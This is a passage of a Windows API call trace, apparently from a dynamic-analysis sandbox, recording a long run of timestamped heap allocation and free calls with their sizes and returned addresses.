0xf6f70 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.657] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.658] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.658] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.658] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.658] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.658] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.658] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.658] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.658] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.658] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.658] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.658] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.658] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.658] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0036.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0036.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0036.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0036.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103c08 | out: hHeap=0xe0000) returned 1 [0036.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105850 [0036.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105970 [0036.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1056a0 [0036.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106030 [0036.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105fa0 [0036.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105c40 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106150 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105bb0 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106300 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105df0 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1061e0 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1060c0 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a00 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106270 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106540 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105cd0 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1058e0 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105d60 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a90 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105b20 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105f10 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105e80 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1064b0 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1065d0 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105730 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1057c0 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107710 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107290 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106d80 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107b00 [0036.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106e10 [0036.661] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1077a0 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105850 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105970 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1056a0 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106030 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105fa0 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105c40 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106150 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105bb0 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106300 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105df0 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1061e0 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1060c0 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a00 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106270 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106540 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105cd0 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1058e0 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105d60 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a90 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105b20 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105f10 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105e80 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1064b0 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1065d0 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105730 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1057c0 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107710 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107290 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106d80 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107b00 | out: hHeap=0xe0000) returned 1 [0036.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106e10 | out: hHeap=0xe0000) returned 1 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1077a0 | out: hHeap=0xe0000) returned 1 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106420 | out: hHeap=0xe0000) returned 1 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xe6ed8 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x109258 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103a88 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105970 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105970 | out: hHeap=0xe0000) returned 1 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105510 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103c50 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x105a90 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103c50 | out: hHeap=0xe0000) returned 1 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a90 | out: hHeap=0xe0000) returned 1 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.668] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.668] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.668] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.668] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.670] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.670] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.670] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.670] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.670] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.670] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.670] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.670] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.670] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.670] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.670] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.672] HeapFree 